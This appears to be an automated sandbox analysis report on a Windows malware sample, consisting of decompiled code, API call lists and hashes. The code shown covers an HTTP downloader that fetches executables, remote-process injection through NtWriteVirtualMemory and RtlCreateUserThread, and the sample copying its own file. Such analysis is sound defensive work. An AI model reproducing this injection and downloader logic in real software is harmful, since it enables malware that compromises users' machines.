                                                                                                                                          				_t136 = _t134 + 0x10;
                                                                                                                                          				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112); // executed
                                                                                                                                          				if(_t55 != 0) {
                                                                                                                                          					_t123 = E004015E0(_v92 + 1);
                                                                                                                                          					E00401BB0(_t123, 0, _v92 + 1);
                                                                                                                                          					E00401640(_t123, _v96, _v92);
                                                                                                                                          					_t137 = _t136 + 0x1c;
                                                                                                                                          					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // executed
                                                                                                                                          					_v8 = _t61;
                                                                                                                                          					if(_t61 != 0) {
                                                                                                                                          						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0); // executed
                                                                                                                                          						_v20 = _t62;
                                                                                                                                          						_push(_t123);
                                                                                                                                          						if(_t62 != 0) {
                                                                                                                                          							E00401510();
                                                                                                                                          							E004018D0(_t118, "https://");
                                                                                                                                          							_t138 = _t137 + 0xc;
                                                                                                                                          							_v52 = "text/*";
                                                                                                                                          							_v48 = "application/exe";
                                                                                                                                          							_v44 = "application/zlib";
                                                                                                                                          							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
                                                                                                                                          							_v40 = "application/gzip";
                                                                                                                                          							_v36 = "application/applefile";
                                                                                                                                          							_v32 = 0;
                                                                                                                                          							_t66 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // executed
                                                                                                                                          							_t126 = _t66;
                                                                                                                                          							_v16 = _t126;
                                                                                                                                          							if(_t126 == 0) {
                                                                                                                                          								L26:
                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                          								InternetCloseHandle(_v8);
                                                                                                                                          								return 0;
                                                                                                                                          							} else {
                                                                                                                                          								_t71 = E004018D0(_t118, "https://");
                                                                                                                                          								_t139 = _t138 + 8;
                                                                                                                                          								if(_t71 == 0) {
                                                                                                                                          									L10:
                                                                                                                                          									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
                                                                                                                                          										goto L25;
                                                                                                                                          									} else {
                                                                                                                                          										_t119 = 0x400;
                                                                                                                                          										_t128 = E004015E0(0x400);
                                                                                                                                          										_t140 = _t139 + 4;
                                                                                                                                          										if(_t128 == 0) {
                                                                                                                                          											_t126 = _v16;
                                                                                                                                          											goto L25;
                                                                                                                                          										} else {
                                                                                                                                          											do {
                                                                                                                                          												_t78 = InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24); // executed
                                                                                                                                          												if(_t78 == 0) {
                                                                                                                                          													if(GetLastError() != 0x7a) {
                                                                                                                                          														E00401510(_t128);
                                                                                                                                          														L23:
                                                                                                                                          														InternetCloseHandle(_v16);
                                                                                                                                          														InternetCloseHandle(_v20);
                                                                                                                                          														InternetCloseHandle(_v8);
                                                                                                                                          														return 0;
                                                                                                                                          													} else {
                                                                                                                                          														_t119 = _t119 + 0x400;
                                                                                                                                          														goto L17;
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t87 = _v24;
                                                                                                                                          													if(_t87 == 0) {
                                                                                                                                          														InternetCloseHandle(_v16); // executed
                                                                                                                                          														InternetCloseHandle(_v20);
                                                                                                                                          														_t111 = _v8;
                                                                                                                                          														InternetCloseHandle(_t111);
                                                                                                                                          														_t91 = E004018D0(_t128, ";End");
                                                                                                                                          														if(_t91 != 0) {
                                                                                                                                          															 *_t91 = 0;
                                                                                                                                          															return _t128;
                                                                                                                                          														} else {
                                                                                                                                          															E00401510(_t128);
                                                                                                                                          															InternetCloseHandle(_v16);
                                                                                                                                          															InternetCloseHandle(_v20);
                                                                                                                                          															InternetCloseHandle(_t111);
                                                                                                                                          															return 0;
                                                                                                                                          														}
                                                                                                                                          													} else {
                                                                                                                                          														_t108 = _t108 + _t87;
                                                                                                                                          														goto L17;
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          												goto L27;
                                                                                                                                          												L17:
                                                                                                                                          												_t128 = E004016A0(_t128, _t119 + _t108);
                                                                                                                                          												_t140 = _t140 + 8;
                                                                                                                                          											} while (_t128 != 0);
                                                                                                                                          											goto L23;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								} else {
                                                                                                                                          									_v12 = 0;
                                                                                                                                          									_v28 = 4;
                                                                                                                                          									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
                                                                                                                                          										L25:
                                                                                                                                          										InternetCloseHandle(_t126);
                                                                                                                                          										goto L26;
                                                                                                                                          									} else {
                                                                                                                                          										_v12 = _v12 | 0x00000180;
                                                                                                                                          										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
                                                                                                                                          											goto L25;
                                                                                                                                          										} else {
                                                                                                                                          											goto L10;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							E00401510();
                                                                                                                                          							InternetCloseHandle(_v8);
                                                                                                                                          							return 0;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						E00401510(_t123);
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					return _t55;
                                                                                                                                          				}
                                                                                                                                          				L27:
                                                                                                                                          			}
                                                                                                                                          0x00404d9a
                                                                                                                                          0x00404d9f
                                                                                                                                          0x00404da2
                                                                                                                                          0x00404dac
                                                                                                                                          0x00404d13
                                                                                                                                          0x00404d13
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d13
                                                                                                                                          0x00404cfd
                                                                                                                                          0x00404cfd
                                                                                                                                          0x00404d02
                                                                                                                                          0x00404d31
                                                                                                                                          0x00404d40
                                                                                                                                          0x00404d42
                                                                                                                                          0x00404d46
                                                                                                                                          0x00404d4e
                                                                                                                                          0x00404d58
                                                                                                                                          0x00404d79
                                                                                                                                          0x00404d84
                                                                                                                                          0x00404d5a
                                                                                                                                          0x00404d5b
                                                                                                                                          0x00404d66
                                                                                                                                          0x00404d6b
                                                                                                                                          0x00404d6e
                                                                                                                                          0x00404d78
                                                                                                                                          0x00404d78
                                                                                                                                          0x00404d04
                                                                                                                                          0x00404d04
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d04
                                                                                                                                          0x00404d02
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d19
                                                                                                                                          0x00404d23
                                                                                                                                          0x00404d25
                                                                                                                                          0x00404d28
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d2c
                                                                                                                                          0x00404ce1
                                                                                                                                          0x00404c77
                                                                                                                                          0x00404c7a
                                                                                                                                          0x00404c81
                                                                                                                                          0x00404c94
                                                                                                                                          0x00404db0
                                                                                                                                          0x00404db6
                                                                                                                                          0x00000000
                                                                                                                                          0x00404c9a
                                                                                                                                          0x00404c9a
                                                                                                                                          0x00404cb2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404cb2
                                                                                                                                          0x00404c94
                                                                                                                                          0x00404c75
                                                                                                                                          0x00404bd9
                                                                                                                                          0x00404bd9
                                                                                                                                          0x00404be5
                                                                                                                                          0x00404bf3
                                                                                                                                          0x00404bf3
                                                                                                                                          0x00404baa
                                                                                                                                          0x00404bab
                                                                                                                                          0x00404bbb
                                                                                                                                          0x00404bbb
                                                                                                                                          0x00404b66
                                                                                                                                          0x00404b66
                                                                                                                                          0x00404b66
                                                                                                                                          0x00000000

APIs
• InternetCrackUrlA.WININET(74B5EA30,00000000,?), ref: 00404B57
• InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Internet$CrackOpen
• String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
• API String ID: 1262293563-2187584305
• Opcode ID: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
• Instruction ID: b075b86cb3f3238e1b45add10c95dfbc6438ce08dd21614d055a406b181498c9
• Opcode Fuzzy Hash: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
• Instruction Fuzzy Hash: D381B971E002097BEB11ABA1EC45FAF77B8EF84754F100176FA04F62D1D7799D108AA9
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E004029E0(void* __ecx, void* _a4, intOrPtr _a8, void* _a12, long _a16, DWORD* _a20, intOrPtr _a24) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				void* _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				long _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				CHAR* _v32;
                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                          				long* _v40;
                                                                                                                                          				long _v44;
                                                                                                                                          				void* _v48;
                                                                                                                                          				long _v52;
                                                                                                                                          				void* _v56;
                                                                                                                                          				long _v60;
                                                                                                                                          				long _v64;
                                                                                                                                          				long _v68;
                                                                                                                                          				long _v72;
                                                                                                                                          				long _v76;
                                                                                                                                          				void* _v80;
                                                                                                                                          				long* _t104;
                                                                                                                                          				long _t111;
                                                                                                                                          				void* _t114;
                                                                                                                                          				void* _t116;
                                                                                                                                          				void* _t117;
                                                                                                                                          				void* _t118;
                                                                                                                                          				CHAR* _t128;
                                                                                                                                          				signed short _t131;
                                                                                                                                          				CHAR* _t133;
                                                                                                                                          				_Unknown_base(*)()* _t134;
                                                                                                                                          				long* _t135;
                                                                                                                                          				intOrPtr _t136;
                                                                                                                                          				CHAR* _t137;
                                                                                                                                          				long* _t140;
                                                                                                                                          				CHAR* _t141;
                                                                                                                                          				CHAR* _t146;
                                                                                                                                          				long _t148;
                                                                                                                                          				CHAR* _t149;
                                                                                                                                          				CHAR* _t160;
                                                                                                                                          				long _t163;
                                                                                                                                          				CHAR** _t164;
                                                                                                                                          				void* _t167;
                                                                                                                                          				void* _t169;
                                                                                                                                          				void* _t172;
                                                                                                                                          				struct HINSTANCE__* _t175;
                                                                                                                                          				void* _t176;
                                                                                                                                          				signed int _t177;
                                                                                                                                          				CHAR* _t179;
                                                                                                                                          				signed int _t184;
                                                                                                                                          				CHAR* _t187;
                                                                                                                                          				_Unknown_base(*)()** _t189;
                                                                                                                                          				void* _t191;
                                                                                                                                          				CHAR* _t192;
                                                                                                                                          				CHAR* _t194;
                                                                                                                                          				long* _t195;
                                                                                                                                          				void* _t197;
                                                                                                                                          				signed short* _t198;
                                                                                                                                          				CHAR** _t200;
                                                                                                                                          				long _t201;
                                                                                                                                          				void* _t203;
                                                                                                                                          				void* _t204;
                                                                                                                                          
                                                                                                                                          				_t172 = __ecx;
                                                                                                                                          				_t104 = _a20;
                                                                                                                                          				_t185 = _a4;
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v16 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				_v48 = 0;
                                                                                                                                          				_v44 = 0;
                                                                                                                                          				 *_t104 = 0;
                                                                                                                                          				RtlImageNtHeader(_a4);
                                                                                                                                          				_t195 = _t104;
                                                                                                                                          				_v40 = _t195;
                                                                                                                                          				if( *_t195 != 0x4550) {
                                                                                                                                          					L5:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_v28 = _t195[0x14];
                                                                                                                                          					_v56 = _a8;
                                                                                                                                          					_v80 = 0x18;
                                                                                                                                          					_v76 = 0;
                                                                                                                                          					_v68 = 0;
                                                                                                                                          					_v72 = 0;
                                                                                                                                          					_v64 = 0;
                                                                                                                                          					_v60 = 0;
                                                                                                                                          					_v52 = 0;
                                                                                                                                          					_t111 = NtOpenProcess( &_v8, 0x1fffff,  &_v80,  &_v56);
if(_t111 != 0) {
	goto L5;
} else {
	if( *0x5d1314 == _t111) {
		L6:
		_t114 = NtAllocateVirtualMemory(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // executed
		__eflags = _t114;
		if(_t114 != 0) {
			goto L4;
		} else {
			_t116 = VirtualAlloc(_t114, _v28, 0x3000, 0x40); // executed
			_t169 = _t116;
			__eflags = _t169;
			if(_t169 == 0) {
				L43:
				__eflags = _v12;
				if(_v12 != 0) {
					 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
				}
				_t117 = _v8;
				__eflags = _t117;
				if(_t117 != 0) {
					NtClose(_t117);
					_t117 = _v8;
				}
				__eflags = _t169;
				if(_t169 != 0) {
					VirtualFree(_t169, 0, 0x8000);
					_t117 = _v8;
				}
				__eflags = _v24;
				_v20 = 0;
				if(_v24 != 0) {
					 *0x5d10ac(_t117,  &_v24,  &_v20, 0x8000);
				}
				_t118 = _v16;
				__eflags = _t118;
				if(_t118 != 0) {
					NtClose(_t118);
				}
				__eflags = 0;
				return 0;
			} else {
				E00401640(_t169, _t185, _v28);
				_t204 = _t203 + 0xc;
				_t187 = _t169 + _t195[0x20];
				__eflags = _t187;
				while(1) {
					_t128 = _t187[0xc];
					_v32 = _t187;
					__eflags = _t128;
					if(_t128 != 0) {
						goto L11;
					}
					__eflags = _t187[4] - _t128;
					if(_t187[4] == _t128) {
						_t135 = _v40;
						_t176 = _v12;
						_t191 = _a4;
						_t45 = _t135 + 0xa0; // 0x45dd842a
						_t46 = _t135 + 0x34; // 0x0
						_t136 =  *_t46;
						_t200 =  *_t45 + _t169;
						_v40 = _t176 - _t136;
						__eflags =  *_t200;
						_v36 = _t191 - _t136;
						if( *_t200 != 0) {
							do {
								_t192 = _t200[1];
								_t50 =  &(_t200[1]); // 0x45dd842e
								_t164 = _t50;
								_v32 = _t164;
								__eflags = _t192 - 8;
								if(_t192 >= 8) {
									_t184 = 0;
									_t194 =  &(_t192[0xfffffffffffffff8]) >> 1;
									__eflags = _t194;
									if(_t194 != 0) {
										asm("o16 nop [eax+eax]");
										do {
											_t177 =  *(_t200 + 8 + _t184 * 2) & 0x0000ffff;
											__eflags = _t177;
											if(_t177 != 0) {
												_t179 =  &(( *_t200)[_t177 & 0x00000fff]);
												_t57 =  &(_t179[_t169]);
												 *_t57 = _t179[_t169] + _v40 - _v36;
												__eflags =  *_t57;
											}
											_t184 = _t184 + 1;
											__eflags = _t184 - _t194;
										} while (_t184 < _t194);
										_t164 = _v32;
									}
								}
								_t200 = _t200 +  *_t164;
								__eflags =  *_t200;
							} while ( *_t200 != 0);
							_t176 = _v12;
							_t191 = _a4;
						}
						_t137 = NtWriteVirtualMemory(_v8, _t176, _t169, _v28, 0); // executed
						__eflags = _t137;
						if(_t137 < 0) {
							goto L43;
						} else {
							_t201 = _a16;
							_t140 = NtAllocateVirtualMemory(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // executed
							__eflags = _t140;
							if(_t140 != 0) {
								goto L43;
							} else {
								_t141 = NtWriteVirtualMemory(_v8, _v24, _a12, _t201, _t140); // executed
								__eflags = _t141;
								if(_t141 < 0) {
									goto L43;
								} else {
									_t146 = RtlCreateUserThread(_v8, 0, 0, 0, 0, 0, _v12 - _t191 + _a24, _v24,  &_v16, 0); // executed
									__eflags = _t146;
									if(_t146 < 0) {
										goto L43;
									} else {
										asm("xorps xmm0, xmm0");
										asm("movlpd [ebp-0x2c], xmm0");
										_t148 = NtWaitForSingleObject(_v16, 0,  &_v48);
										__eflags = _t148 - 0x102;
										if(_t148 == 0x102) {
											while(1) {
												_t160 =  *0x5d2118; // 0x0
												__eflags = _t160;
												if(_t160 != 0) {
													break;
												}
												Sleep(0xbb8); // executed
												_t163 = NtWaitForSingleObject(_v16, 0,  &_v48);
												__eflags = _t163 - 0x102;
												if(_t163 == 0x102) {
													continue;
												} else {
												}
												goto L41;
											}
											TerminateThread(_v16, 0);
										}
										L41:
										_t149 = GetExitCodeThread(_v16, _a20);
										__eflags = _t149;
										if(_t149 == 0) {
											goto L43;
										} else {
											NtClose(_v16);
											 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
											NtClose(_v8);
											VirtualFree(_t169, 0, 0x8000);
											_v20 = 0;
											 *0x5d10ac(_v8,  &_v24,  &_v20, 0x8000);
											return 1;
										}
									}
								}
							}
						}
					} else {
						goto L11;
					}
					goto L54;
					L11:
					_t175 = E00408B00( &(_t128[_t169]));
					_t204 = _t204 + 4;
					_v36 = _t175;
					__eflags = _t175;
					if(_t175 == 0) {
						goto L43;
					} else {
						_t197 = _t169 +  *_t187;
						_t189 = _t169 + _t187[0x10];
						__eflags = _t197 - _t169;
						_t198 =  ==  ? _t189 : _t197;
						__eflags = _t198 - _t169;
						if(_t198 == _t169) {
							goto L43;
						} else {
							_t131 =  *_t198;
							__eflags = _t131;
							if(__eflags == 0) {
								L19:
								_t187 =  &(_v32[0x14]);
								continue;
							} else {
								L14:
								if(__eflags >= 0) {
									_t133 = _t131 + 2 + _t169;
									__eflags = _t133;
								} else {
									_t133 = _t131 & 0x0000ffff;
								}
								_t134 = GetProcAddress(_t175, _t133);
								 *_t189 = _t134;
								__eflags = _t134;
								if(_t134 == 0) {
									goto L43;
								}
								_t131 = _t198[2];
								_t198 =  &(_t198[2]);
								_t175 = _v36;
								_t189 = _t189 + 4;
								__eflags = _t131;
								if(__eflags != 0) {
									goto L14;
								} else {
									goto L19;
								}
							}
						}
					}
                                                                                                                                          										goto L54;
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							_t167 = E00408270(_t172, _v8);
                                                                                                                                          							_t203 = _t203 + 4;
                                                                                                                                          							if(_t167 != 0) {
                                                                                                                                          								goto L6;
                                                                                                                                          							} else {
                                                                                                                                          								L4:
                                                                                                                                          								NtClose(_v8);
                                                                                                                                          								goto L5;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L54:
                                                                                                                                          			}
Per-line instruction address column for the decompiled function above (flattened by extraction; 0x00000000 marks pseudo-lines with no address): entries range from 0x004029e0 to 0x00402dc2.
                                                                                                                                          0x00402b26
                                                                                                                                          0x00402b28
                                                                                                                                          0x00402b2b
                                                                                                                                          0x00402b2e
                                                                                                                                          0x00402b30
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b36
                                                                                                                                          0x00402b3b
                                                                                                                                          0x00402b3d
                                                                                                                                          0x00402b3f
                                                                                                                                          0x00402b41
                                                                                                                                          0x00402b44
                                                                                                                                          0x00402b46
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b4c
                                                                                                                                          0x00402b4c
                                                                                                                                          0x00402b4e
                                                                                                                                          0x00402b50
                                                                                                                                          0x00402b80
                                                                                                                                          0x00402b83
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b52
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b52
                                                                                                                                          0x00402b52
                                                                                                                                          0x00402b5c
                                                                                                                                          0x00402b5c
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b60
                                                                                                                                          0x00402b66
                                                                                                                                          0x00402b68
                                                                                                                                          0x00402b6a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b70
                                                                                                                                          0x00402b73
                                                                                                                                          0x00402b76
                                                                                                                                          0x00402b79
                                                                                                                                          0x00402b7c
                                                                                                                                          0x00402b7e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b7e
                                                                                                                                          0x00402b50
                                                                                                                                          0x00402b46
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b30
                                                                                                                                          0x00402b0f
                                                                                                                                          0x00402af4
                                                                                                                                          0x00402aa0
                                                                                                                                          0x00402aa3
                                                                                                                                          0x00402aa8
                                                                                                                                          0x00402aad
                                                                                                                                          0x00000000
                                                                                                                                          0x00402aaf
                                                                                                                                          0x00402aaf
                                                                                                                                          0x00402ab2
                                                                                                                                          0x00000000
                                                                                                                                          0x00402ab2
                                                                                                                                          0x00402aad
                                                                                                                                          0x00402a9e
                                                                                                                                          0x00402a96
                                                                                                                                          0x00000000

APIs
• RtlImageNtHeader.NTDLL(?), ref: 00402A2D
• NtOpenProcess.NTDLL(00000000,001FFFFF,?,?), ref: 00402A8E
• NtClose.NTDLL(00000000), ref: 00402AB2
• NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000040), ref: 00402AD4
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,00000000), ref: 00402AEA
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 00402B60
• NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C0A
• NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000004), ref: 00402C2F
• NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C48
• RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00402C75
• NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402C94
• Sleep.KERNELBASE(00000BB8), ref: 00402CB5
• NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402CC0
• TerminateThread.KERNEL32(00000000,00000000), ref: 00402CD4
• GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00402CE0
• NtClose.NTDLL(00000000), ref: 00402CED
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D03
• NtClose.NTDLL(00000000), ref: 00402D0C
  • Part of subcall function 00408270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
  • Part of subcall function 00408270: GetProcAddress.KERNEL32(00000000), ref: 0040828C
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D1A
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D37
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D5F
• NtClose.NTDLL(00000000), ref: 00402D6D
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D82
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402DA6
• NtClose.NTDLL(00000000), ref: 00402DB4
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Virtual$Memory$Free$Close$Thread$AddressAllocateObjectProcSingleWaitWrite$AllocCodeCreateExitHandleHeaderImageModuleOpenProcessSleepTerminateUser
• String ID:
• API String ID: 4217436290-0
• Opcode ID: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
• Instruction ID: aa250f91bc0df1c709c0f0294cc1af27058bb64088126e2459afa89f473692c1
• Opcode Fuzzy Hash: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
• Instruction Fuzzy Hash: 53C14C71A01209EFDB20DF95DD49BEEBBB9FF04300F14406AE905B6290D775AE44DB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 42%
E00406340(intOrPtr _a4) {
	void* _v8;
	void* _v12;
	long _v16;
	long _v20;
	long _v24;
	long _v28;
	long _v32;
	void* _v36;
	long _v40;
	long _v44;
	intOrPtr _v48;
	char* _v52;
	long _v56;
	void* _v60;
	long _v64;
	void* _v68;
	char _v76;
	char _v84;
	short _v1108;
	long _t59;
	long _t69;
	long* _t70;
	void* _t71;
	void* _t74;
	long _t83;
	signed int _t85;
	void* _t90;
	void* _t109;

	_v8 = 0;
	asm("xorps xmm0, xmm0");
	_v12 = 0;
	_v60 = 0;
	asm("movups [ebp-0x34], xmm0");
	_v40 = 0;
	_v36 = 0;
	_v32 = 0;
	_v28 = 0;
	_v24 = 0;
	_v20 = 0;
	_v16 = 0;
	_v68 = 0;
	_v64 = 0;
	asm("movq [ebp-0x48], xmm0");
	asm("movq [ebp-0x50], xmm0");
	_t59 = GetModuleFileNameW(0,  &_v1108, 0x200);
	if(_t59 == 0 || _t59 == 0x200) {
		L6:
		return 0;
	} else {
		_push(0);
		_push(0);
		_push( &_v76);
		_push( &_v1108);
		if( *0x5d10b8() != 1) {
			goto L6;
		} else {
			_v60 = 0x18;
			_v52 =  &_v76;
			_v56 = 0;
			_v48 = 0x40;
			_v44 = 0;
			_v40 = 0;
			_t69 = NtCreateFile( &_v8, 0x120089,  &_v60,  &_v36,  &_v68, 0x80, 3, 1, 0x60, 0, 0); // executed
			if(_t69 != 0) {
				goto L6;
			} else {
				_t70 =  &_v28;
				__imp__GetFileSizeEx(_v8, _t70);
				if(_t70 != 0) {
					_t71 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
					_t109 = _t71;
					if(_t109 != 0) {
						_t74 =  *0x5d10bc(_v8, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, 0); // executed
						if(_t74 == 0) {
							NtClose(_v8); // executed
							_t104 = _a4;
							_push(0);
							_push(0);
							_push( &_v84);
							_push(_a4);
							if( *0x5d10b8() == 1) {
								_v60 = 0x18;
								_v52 =  &_v84;
                                                                                                                                          											_v56 = 0;
                                                                                                                                          											_v48 = 0x40;
                                                                                                                                          											_v44 = 0;
                                                                                                                                          											_v40 = 0;
                                                                                                                                          											_t83 = NtCreateFile( &_v12, 0x120116,  &_v60,  &_v36,  &_v68, 0x80, 0, 0, 0x60, 0, 0); // executed
                                                                                                                                          											if(_t83 != 0) {
                                                                                                                                          												L16:
                                                                                                                                          												VirtualFree(_t109, 0, 0x8000);
                                                                                                                                          												_t85 = E00407ED0(_t104);
                                                                                                                                          												asm("sbb eax, eax");
                                                                                                                                          												return  ~( ~_t85);
                                                                                                                                          											} else {
                                                                                                                                          												_v20 = _t83;
                                                                                                                                          												_v16 = _t83;
                                                                                                                                          												_t90 =  *0x5d10c0(_v12, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, _t83); // executed
                                                                                                                                          												_push(_v12);
                                                                                                                                          												if(_t90 == 0) {
                                                                                                                                          													NtClose();
                                                                                                                                          													VirtualFree(_t109, 0, 0x8000); // executed
                                                                                                                                          													return 1;
                                                                                                                                          												} else {
                                                                                                                                          													NtClose();
                                                                                                                                          													goto L16;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										} else {
                                                                                                                                          											VirtualFree(_t109, 0, 0x8000);
                                                                                                                                          											return 0;
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										NtClose(_v8);
                                                                                                                                          										VirtualFree(_t109, 0, 0x8000);
                                                                                                                                          										return 0;
                                                                                                                                          									}
                                                                                                                                          								} else {
                                                                                                                                          									NtClose(_v8);
                                                                                                                                          									return 0;
                                                                                                                                          								}
                                                                                                                                          							} else {
                                                                                                                                          								NtClose(_v8);
                                                                                                                                          								goto L6;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}
Instruction addresses covered by the listing above: 0x00406354 to 0x004065ca (per-line address column)

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 004063BC
• RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 004063E4
• NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 0040643B
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0040644C
• NtClose.NTDLL(00000000), ref: 00406459
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?), ref: 00406472
• NtClose.NTDLL(00000000), ref: 00406481
• NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004064A5
• NtClose.NTDLL(00000000), ref: 004064B2
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064C0
• NtClose.NTDLL(00000000), ref: 004064D1
• RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 004064E3
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064F5
• NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00406550
• NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406576
• NtClose.NTDLL(00000000), ref: 00406583
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00406591
• NtClose.NTDLL(00000000), ref: 004065AC
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004065BA
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CloseFile$Virtual$FreePath$Name$CreateName_$AllocModuleReadSizeWrite
• String ID: @
• API String ID: 1655568127-2766056989
• Opcode ID: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
• Instruction ID: 2fd8ed99f3ae58de8391e8baf5aa5f6abea6aa1d3bd579213be14ba4813b3cc0
• Opcode Fuzzy Hash: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
• Instruction Fuzzy Hash: B4715A71A4121CBBEB209F90DC49BEEBBB8FB08704F100126F605F62D0D7B55A588B99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 35%
